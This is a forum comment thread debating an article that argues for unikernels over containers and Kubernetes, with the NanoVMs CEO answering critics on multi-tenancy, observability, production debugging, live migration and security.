1. 18
  1.  

  2. 6

    I think unikernels are a really interesting and great idea; I love their simplicity over complexity approach to problem solving.

    But I’d love to have a more ingenuous discussion about them, e.g.

    This is why we keep on seeing articles like the one from AirBnb complaining that kubernetes has serious performance problems.

    This quote links to an article that, more or less, discusses how Airbnb approached the common problems of multi-tenancy the Kubernetes way. Unikernels, I assure you, have the same, similar, or even new multi-tenancy problems. And they have their own unikernel flavor of solutions.

    The takeway from that article should not be that “Kubernetes has serious performance problems” so much as “multi-tenancy is hard and each platform has its own solutions”. It doesn’t feel like an honest takeaway and makes the rest of the writeup feel disingenuous, i.e. it lost my trust in the author’s objectivity.

    1. 1

      The whole point here is that multi-tenancy is much easier to deal with considering they are deployed as vms so they don’t have to reinvent the wheel and the scheduling and the isolation problems are resolved by the cloud providers (ergo no k8s necessary).

      If we are talking about having an ingenuous discussion can you explain why you think it would be harder?

    2. 3

      The article should probably disclose that the author is the CEO of NanoVMs, which develops the Nanos unikernel and Ops deployment tool.

      Having said that, I agree about the complexity of Kubernetes and related things. But rather than completely dump Linux inside the VM, I think I’d go with something like LinuxKit, which can build minimal, immutable Linux-based VM images, using Docker (or is it OCI) images. IMO, this achieves many of the benefits of unikernels, without throwing away the proven, mature foundation of Linux.

      1. 1

        The author profile discloses it but yes I’m at NanoVMs.

        As for the other - you are still stuck with linux then right? Why not just use a linux vm then? Cause you have all the same problems that linux has. We’re not just trying to fix container issues here. We’re trying to fix longstanding linux issues. Again, Linux is 30 years old and is largely the same as Unix. I’ve seen a lot of ‘windows 7 EOL’ lately but guess what? Windows 95 was released after Linux was. There’s an awful lot of really bad software in the FOSS world and unikernels offer the chance to start fresh and really wipe the slate clean.

        1. 7

          There’s an awful lot of really bad software in the FOSS world and unikernels offer the chance to start fresh and really wipe the slate clean.

          There’s also a lot of really good, featureful, well-debugged software in the FOSS world, including the Linux kernel. You mention the age of the kernel as if it’s a bad thing, but building upon mature technology, rather than starting over just for the sake of wiping the slate clean, is how we make progress. To put it bluntly, I have a lot more confidence in the reliability and performance of the Linux kernel than I have in your two-year-old unikernel. At the same time, using something like LinuxKit, we can drop the user-space components that really are redundant while keeping the good parts.

          1. 1

            To be clear - I’m not denying your right of faith. :)

            For this argument it’s not really about the kernel per-se - it’s the constructs it has that allows software to run rampant and ripping that out of linux is not as easy as applying an overly restrictive seccomp to it. Multiple processes and all the interesting SYSV IPC stuff you can do with them is a very large chunk of code. Think about the implications that has to say the scheduler. Or think how this applies to security.

            Likewise, half of linux is merely device drivers. Just last fall there was a discussion on the LKML to finally remove floppy disk support and yet someone wanted to keep supporting it for ‘posterity’. Ripping some of this out is more political than anything else. However, some very famous and loved software projects such as postgresql (which would never fit in an unikernel) are inherently built around some of these primitives. That’s why you just can’t jettison the bathwater. At some point you have to state what you are going to keep and what you are going to throw.

            As for userspace - that’s an entirely different mess. Case in point - try and install an interpreted language such as python or ruby or something of that nature. You’ll end up installing a half-dozen other compilers each depending on a whole legion of libraries that have been around for a few dozen years. Some like libxml (compiled into every single interpreter I know of) have a fully functioning ftp server in them - why?

      2. 3

        Overall I do like the idea of using unikernels instead of containers.

        There are several arguments in this article which don’t make sense for me.

        Unikernels Avoid Vendor Serverless Lock-In

        You could replace the word “unikernel” with “container” in this whole section and it would equally apply. I think that the author is specifically talking about poor container usage where people are running many processes instead of just one. Which, to be fair, is all too common, but that’s a different discussion altogether. You could also design bad bloated unikernels.

        Unikernels Avoid Kubernetes Complexity

        I agree with much of the points in this section being critical about the complexity of the big container orchestration tools… but again this paragraph sounds like the author has only experienced badly crafted containers:

        Containers are notorious for eating databases alive. With unikernels, you can pause, stop, restart, and even live migrate with ease with no need to use external software to do any of this because, at the end of the day, they are still just plain old VMs, albeit specially-crafted ones.

        1. 7

          unikernels get rid of the notion of the “server” and embrace a serverless mindset. That is not to say there is no server, but it’s not one you can ssh into and install a bunch of crap

          The “bunch of crap” are crucial tools for monitoring, logging, security (e.g. HIDS), debugging (e.g. strace).

          Attackers are still equally able to attack a vulnerability in your application and inject an in-memory payload as before.

          Essentially you gave up detection and forensic capabilities.

          It’s either working or it’s not.

          Until you want to investigate an occasional glitch or performance issue that depends on any non-trivial interaction between application, kernel, drivers, firmware, hardware.

          Unikernels Avoid Kubernetes Complexity

          Also traditional UNIX processes and OS packages. Nowadays they provide very good sandboxing without the additional layers of filesystems and virtual networking.

          1. 0

            The logging/monitoring/debugging points are just flat out wrong. This gets brought up way too often and it’s just not correct. I’d appreciate it if people would stop repeating things that simply aren’t true.

            Logging works out of the box. Ship it to papertrail/elastic/splunk/whatever. Monitoring works out of the box. Newrelic, prometheus, lightstep, etc. works out of the box.

            HIDS? For what? You can’t login to it - there aren’t the notion of users.

            As for in-memory payloads go for it - it becomes much much harder cause you can’t spawn new processes and at least Nanos employs ASLR and common page protections found in Linux so imo that becomes way harder to attack.

            As for ‘debugging’ firmware/kernel/hardware - a) none of that would be debugged in a unikernel cause it’s all virtual and b) why would you do that on a prod system? That’s the sort of work you do in a development environment - not a live system.

            1. 2

              That’s the sort of work you do in a development environment - not a live system.

              Until your repro is in a live system and the company is losing money so you need to debug it now.

              1. 1

                yeh, I’d completely disagree here - most ops people don’t code at all and frankly if you are going to “debug” “kernels, drivers, firmware, hardware” on a live prod system - that’s a firing offense in my most humble opinion

                1. 2

                  Usually, the issue is in userspace. But when downtime is costing thousands of dollars a minute, and your repro slipped past all of your testing, QA, staged rollouts, and SREs, you go into the vault, get the SSH keys, and debug wherever you can.

                  1. 1

                    I’d agree with the sentiment that it is usually in userspace 100%.

                    Thousands/min? Was this measured over the course of a week or over the course of a few hours? If over the week why did it suddenly become a problem? If over the course of a hour was it because of a bad deploy that could simply be rolled back?

                    Also, why would a single instance cause thousands/min damage and not more than a few servers? If it was a single instance perhaps can just kill that one. If it’s infectious than that points something non-instance specific.

                    As someone that has had to personally deal with shitty code blowing up servers at odd hours of the night repeatedly for years I get the feeling - I get it :) . I just don’t think the practice of sshin’g into random servers is a sustainable process anymore. Definitely not when it’s just splashing water on forest fires vs fixing the root problem.

                    1. 1

                      So, in the instance I am thinking of, someone else’s rollout changed the query being sent to our service, which broke accounting for a significant portion of the ads served by YouTube.

              2. 1

                You cannot possibly instrument/log every parameter to every function in both user and kernel space for every call. It is way, way too expensive. The same thing goes for per-processor utilisation with subsecond resolution. It has to be done in a targeted way, when it is required.

                I feel like people who object against live diagnostics have never heard of perf and BPF, or at least not used them to solve hard problems.

                Centralised collection of metrics is great for discovering trends and forecasting. It is not of sufficient resolution to diagnose issues in production.

                1. 1

                  We’ve heard. :)

                  Nanos even has support for both ftrace ( https://github.com/nanovms/nanos/tree/master/tools/trace-utilities ) like functionality and strace like functionality.

                  I still hold to the case that if you are resorting to running something like perf in prod you’ve failed to instrument or profile your application beforehand. The author explicitly warns in the docs that you might want to even test before using production as it has had bugs resulting in kernel panics in the past. Many of the problems that people “can’t replicate” in a dev/test environment actually can be and should be.

              3. 0

                The “bunch of crap” are crucial tools for monitoring, logging, security (e.g. HIDS), debugging (e.g. strace).

                Even though I agree this is typically the case, this is not the way “DevOps” is supposed to work. Containers should not have all this stuff in them either. Containers should run 1 process. They can’t always work this way, without rewriting a program, but we should strive for that.

                Attackers are still equally able to attack a vulnerability in your application and inject an in-memory payload as before.

                Yes, but the attack surface is greatly reduced.

                Also traditional UNIX processes and OS packages. Nowadays they provide very good sandboxing without the additional layers of filesystems and virtual networking.

                I can’t help but largely agree with this. However, there are many benefits to the application isolation from VMs, unikernels, and containers, which allow for sysadmin models that are not possible with just processes and packages on a single host.

                1. 4

                  So if a container should only run 1 process, what’s the difference between a container and a statically linked program running in a jail?

                  1. 1

                    Containers should not have all this stuff in them either. Containers should run 1 process.

                    Indeed. All the tooling is on the base OS and often works in roughly the same way against normal unix processes and containers.

                    Attackers are still equally able to attack a vulnerability in your application and inject an in-memory payload as before.

                    Yes, but the attack surface is greatly reduced.

                    Not if you consider the point above. The application is still the same codebase (regardless if it’s running as a sandboxed process, a container and so on). You still have to either deploy and run all the ancillary tooling at some point in the stack or have unmanaged black boxes around.

                    1. 0

                      The reduction in attack surface, while true, is not the main security selling point imo. It’s the fact that most common exploits wish to execute other programs, usually many others. If I want to take advantage of your weak wordpress setup and install a cryptominer not only is it a different program - it’s probably not written in php and thus I won’t be able to install it in a unikernel environment and run it. I’m forced to inject my payload in-memory as you state and that makes things rather hard very very fast. Most payloads simply try to exec /bin/sh as fast as possible. Can you code a cryptominer with ROP alone? Can you code a mysqlclient with ROP alone?

                      I’d love to see this.

                2. 0
                  • Your argument here doesn’t match the header you pasted (serverless) - so not sure what you are trying to point out here - the security side of things or serverless lock-in? If you can elaborate I can help provide pointers. If it’s the security side of things - the fact that it is single process by architectural design deals a pretty hefty blow to all the malware found in containers today like the stuff mentioned in https://unit42.paloaltonetworks.com/graboid-first-ever-cryptojacking-worm-found-in-images-on-docker-hub/ . Otherwise, that header is about serverless offerings like lambda or google cloud run.

                  • There’s a quite a lot of “orchestration” tooling that is arguably necessary in the container ecosystem precisely because they insist on duplicating networking/disk on top of existing virtualization. The point I was trying to make here was that since at the end of the day these are virtual machines - you get all that “orchestration” for free. Make sense?

                  1. 1

                    From Unikernels Avoid Vendor Serverless Lock-In

                    However, unlike most serverless offerings that are entirely proprietary to each individual public cloud provider, unikernels stand apart because instead of some half-baked CGI process that is different from provider to provider, they assume the basic unit of compute is a VM that can be shuttled from one cloud to the next and the cloud provider is only responsible from the virtual machine down.

                    I don’t understand how this is unique to unikernels. You can shuttle containers from one server (or cloud provider) to the next.

                    Security- Yes, containers and their tooling are terrible here. Unikernels, especially well designed unikernels really shine in this regard.

                    There’s a quite a lot of “orchestration” tooling that is arguably necessary in the container ecosystem precisely because they insist on duplicating networking/disk on top of existing virtualization. The point I was trying to make here was that since at the end of the day these are virtual machines - you get all that “orchestration” for free. Make sense?

                    Ok I think I’m getting your perspective now. You’re assuming the container orchestration software is running inside of VMs managed in-turn by VM orchestration software. More abstraction, more code, more attack surface, more problems. Totally agree here, if I’ve got it right now. Maybe you could spell it out a bit more at the start of the article, even though it’s quite clear now on re-read once I’ve already grabbed onto the perspective.

                    As an aside, container orchestration software could run directly on a hypervisor, and that’s where things seem to be moving to in the cloud-native industry. Which is going to be… exciting, from a security perspective.

                    1. 2
                      • afaik live migration is still not a production quality feature for containers although it has existed in the vm world for over a decade now? and the container ecosystem has invented an entire language to describe the whole concept of persistence which is trivial in vms and non-trivial in containers, but this section wasn’t really taking aim at containers

                      • yeh - the security argument wasn’t really for that - it’s the fact that if you are spinning up a k8s stack on gcloud or aws you are inherently already on top of an existing vm stack and there’s a ton of duplication going on here which makes no sense from a performance or complexity standpoint - the security arguments are a bit different, as far as the containers on hypervisor - I know kube-virt is there and I see this concept talked about a lot on twitter but I don’t see much movement there, regardless - that’s essentially just stuffing a linux inside of a vm and using the container mechanisms for orchestration - part of the security story here is not just ‘container suck at security’ - it’s deeper than that - it’s the fact that linux is ~30 years old and was built in a time before heavy commercialized virtualization (ala vmware) and before the “cloud” - these two abstractions give us a chance to deal with long-standing architectural issues of the general purpose operating system

                      1. 1

                        Regarding live migration, isn’t it rare for public cloud providers to actually support this?

                        1. 1

                          That’s not a primitive that they traditionally expose as-is you are correct. To do so in a free-for-all environment would probably have some serious security/scheduling ramifications, however, you see it pop up in quite a few places regardless. For instance if you go boot a database on google cloud right now and give it say 8 gig, insert a few hundred thousand rows, you can instantly upgrade that database to 16 gig or 32 gig ram without it actually going down. Behind the scenes they are spinning up a new vm, transparently migrating page by page to the new vm without destroying the live database and then shutting down the old vm. Also, AWS uses it to migrate vms from faulty hardware as well.

                          Of course in private cloud situations this is routinely used for backup/DR.

                          This is all to say that there are many many features that are simply not possible under a container paradigm.

                        2. 1

                          it’s the fact that linux is ~30 years old and was built in a time before heavy commercialized virtualization (ala vmware) and before the “cloud”

                          What’s the connection? UNIX is older, virtualization exists since 1960ies and hardware virtualization since 1970s.

                          1. 2

                            The keyword here being “commercialized virtualization”. We are talking about ESX from VMWare here. Anyone using large sets of servers in north america and not using AWS (api on kvm/xen) or Google Cloud (api on kvm) is using xen from Citrix or esx from VMWare.

                            We didn’t have style of offering in the 90s. Everyone had to use real servers and actually use the unixisms of multiple processes with multiple users on the same box. You’d pop into a sun box and use commands like who and see a half dozen users. You could be the BOFH and wall them a message stating you were kicking them off.

                            Times have changed. Because we not only have access to virtualization in private datacenters but entire APIs against the ‘cloud’ we can finally drop the chains that have existed in unix land for so long and solve a lot of the problems like performance and security that exist.

                            1. 1

                              Isn’t making Linux more fitted for virtualization one of the motivations for systemd?

                              1. 2

                                When I say virtualization I’m speaking about classical machine level virtualization not carving up a linux system with namespaces. The OSTEP book, while one of the more accessible books on operating systems, uses virtualization in a very liberal sense. Ever since then we’ve seen the containerati abuse the term as well and this is where the confusion sets in.

                                Machine level virtualization has actual hardware capabilities to carve up the iron underneath. Machine level virtualization doesn’t care what the operating system is (linux, macos, windows, etc.), systemd otoh is clearly linux only (and a very specific set of linux at that). In fact today’s virtualization (vs that of 2001) is so sophisticated from things like passthrough and nic multiplexing it’s possible to run vms faster than an average linux on the hardware itself - that’s how good it is today.

                                That is why I’m very hesitant to label namespaces and their friends ‘virtualization’. To me that’s a very different thing.

                                1. 1

                                  Thanks for taking the time to clarify!

                              2. 1

                                Is there also an implication with “ Linux is 30 years old” that Linux has not been developed since its inception? That something is old is not an automatic disqualification if it has active development.

                                1. 3

                                  It’s not about the age. It’s the fact that the environment has changed and core concepts are not appropriate anymore. We had to use operating systems that supported multiple processes by multiple users in the 90s. Linus’ computer was a 286/386 in 93. We didn’t have commercialized virtualization or the cloud. Back in the 70s when the concept was delivered originally in Unix they were using computers like the pdp-7 and pdp-11 that took up entire walls and cost half a million dollars. Clearly back then that architecture had to be that way.

                                  Contrast/compare today when even small 20 person companies can be using tens or even hundreds of vms because they have so much software. We need not mention the big players that pay AWS hundreds of millions of dollars/year or banks that wholly own entire sets of datacenters completely virtualized.

                                  So it’s not the fact that linux is 30 years old or unix is 50 years old - it’s the concepts of being able to say run a database and a webserver on the same machine or the fact that you even want the concept of a interactive ‘user’ when you have a fleet of thousands of vms. Most people’s databases don’t even fit on a single machine anymore, a lot of their web services don’t either - anyone with a load balancer can show you that. We’ve consumed so much software that the operating system has largely inversed itself yet we are still using the same architecture that was designed for a completely different time period and it’s not something you can just yank out or seccomp away.

                                  1. 2

                                    That’s a very interesting perspective. Thanks for explaining in greater detail!

                    2. 2

                      This is a tangent brought on by the video link in that post… but damn, I miss xtranormal. Is there anything similar around these days?

                      1. 1

                        I think it’s still around.

                        1. 1

                          Nice. It looks like someone has revived it, though it no longer has any kind of free version. It had gone away completely for a while.

                      2. 1

                        are rumpkernels dead? at least the website isn’t resolving anymore.

                        1. 1

                          Last word is that Antti took up brewing beer.

                          1. 1

                            good for him i guess :)

                            1. 1

                              That reminds me, I’m curious about why you chose to write your own unikernel rather than continuing his work. With the latter approach, you’d have the solid foundation of NetBSD’s drivers and TCP/IP stack, while keeping the advantages of unikernels.

                              1. 1

                                Half of the tcp/ip stack has been temporarily borrowed from LWIP (although there’s a very high chance it’s replaced in the next year depending on time/resources).

                                Drivers are actually a non-issue if you presume that things will only be deployed in a vm (we have 0% intention to run on real hardware - it’s a part of the architectural model). Then you just need to support the disk, network, clock, etc. and those we obviously re-use for whatever the hypervisor is.

                                It also might help that Antti had no intention of making a ‘unikernel’. His thesis revolved around how one could debug/switch out/fix drivers in a live system.

                                Lastly, we saw early on that forcing people to re-compile software they didn’t write was a non-starter.

                                1. 1

                                  I agree with you that being able to use existing binaries compiled for Linux is a very useful feature. So rumprun certainly isn’t the full solution. I also understand that you don’t need a large selection of drivers. But having NetBSD’s TCP/IP stack and filesystem, if nothing else, would have been useful, right? You could then have implemented Linux emulation on top of that. So I wonder if you considered that approach, and if so, why you rejected it. Alternatively, did you consider building on OSv? I’m sure that what you want to sell isn’t the kernel per se, but higher-level tools on top of it. So why not build on existing work?

                                  1. 1

                                    Not as useful as you might think. Whatever you port you have to support.

                                    Emulating linux from bsd would be an entirely different ballgame that we don’t wish to expend resources on. Building a systems company is a bit different from building a SaaS company. First off, it’s not ‘super hot’ and second it takes a long time (engineering years) to get even the smallest stuff going. There’s this idea of innovation tokens and you can only spend so many at a time.

                                    Also, why would we build on dead (or not financially enabled) projects that we don’t control?

                                  2. 1

                                    Drivers are actually a non-issue if you presume that things will only be deployed in a vm (we have 0% intention to run on real hardware - it’s a part of the architectural model). Then you just need to support the disk, network, clock, etc. and those we obviously re-use for whatever the hypervisor is.

                                    i think a really interesting use case for unikernels are cheap arm boards though. if you have the whole system for yourself, a 15$ board might go a long way.

                                    1. 1

                                      agreed, espc w/the confluence of 5g/ML/edge - nanos doesn’t do ARM today but it might in the future, wink wink nudge nudge

                                      edit: i might’ve responded too fast - even if we support ARM in the future it’d still be only as a vm - not flashing the device (we’re def. not the only ones that think this way)